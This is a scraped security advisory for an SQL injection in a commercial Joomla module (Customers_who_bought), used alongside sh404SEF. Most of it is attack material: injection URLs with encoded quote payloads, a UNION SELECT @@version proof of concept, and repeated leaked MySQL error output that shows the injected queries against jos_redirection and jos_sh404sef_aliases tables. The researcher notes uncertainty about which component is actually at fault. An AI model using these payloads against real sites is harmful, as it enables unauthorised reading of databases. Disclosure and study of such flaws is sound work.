扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
[~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla Module (Customers_who_bought...) SQL Injection Vulnerability [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TYPE: COMMERCIAL [~]>> PRICE: 14,95€ [~]>> TESTED ON: Demo Site !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Test done against Customers_who_bought (VirtueMart Module) and sh404SEF Joomla component [~]>> Both Commercial Joomla extensions, so my researching is poor. Injection is done in url redirection [~]>> (View SQL errors) and result can be visible in source code, url, error page,... [~]>> Since sh404SEF is used I cann't detect affected vars, but also there are BSQLi. [~]>> Trying to search the module/component vulnerable, i've tested sh404SEF and VirtueMart. But Vulnerability [~]>> cann't reproduce. Probably issue is in Customers_who_bought Module (hence advisory title). [~]>> AFFECTED VERSIONS: Confirmed in 1.1 stable but probably other versions also [~]>> RISK: Medium/High [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> SQL ERRORS: [~]>> Making an error --> Example: http://[SITE]/[JOOMLA_PATH]/%27%20AND%201=1 No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY rank ASC LIMIT 1' at line 1 SQL=SELECT oldurl, newurl FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1' ORDER BY rank ASC LIMIT 1 No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY rank ASC LIMIT 1' at line 1 SQL=SELECT oldurl, newurl FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1/' ORDER BY rank ASC LIMIT 1 No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT newurl FROM jos_sh404sef_aliases WHERE alias = '[JOOMLA_PATH]' AND 1=1' No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT newurl FROM jos_sh404sef_aliases WHERE alias = '[JOOMLA_PATH]' AND 1=1' No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT * FROM jos_redirection WHERE oldurl = '[JOOMLA_PATH]' AND 1=1' Array ( [0] => option [1] => [JOOMLA_PATH] [2] => ' AND 1=1 ) [~]>> PROOF OF CONCEPT: [~]>> http://[SITE]/[JOOMLA_PATH]/[SQL] [~]>> http://[SITE]/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]... |
体验盒子
